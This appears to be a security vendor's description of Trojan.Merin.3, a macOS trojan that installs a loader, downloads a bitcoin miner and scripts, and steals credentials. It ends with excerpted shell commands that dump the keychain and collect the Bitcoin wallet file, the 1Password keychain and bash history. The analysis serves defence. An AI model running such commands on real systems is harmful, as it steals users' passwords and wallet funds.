A Trojan targeting Mac OS. Once the infected application is downloaded and run, Trojan.Merin.3 executes a special script that launches the Trojan’s loader. The loader is installed in one of the following home directory folders:
- Library/evoCam4
- Library/Manager
- Library/Pixel_mator
under the name of eCamd or twitterd.
The loader downloads the bin.bop archive from one of FTP servers. The archive contains the bitcoin files and the Trojan’s main module:
- DiabloMiner
- acab.sh
- fxagent
- kc_dump.sh
- kcd.scpt
- kd.sh
- launch.sh
- mids.sh
- p_start.sh
The Trojan’s main module can steal user passwords, digital wallet data, and bash logs (.bash_history) and send this data to the remote command and control server.
The module can execute the following commands:
...
uuencode $HOME/Library/Application\ Support/Bitcoin/wallet.dat xyz >> $D_FILE
...
zip -X -r key.zip $HOME/Library/Application\ Support/1Password/1Password.agilekeychain > /dev/null
...
cat "$HOME/.bash_history" >> $D_FILE
...
security dump-keychain -d > s_dump.txt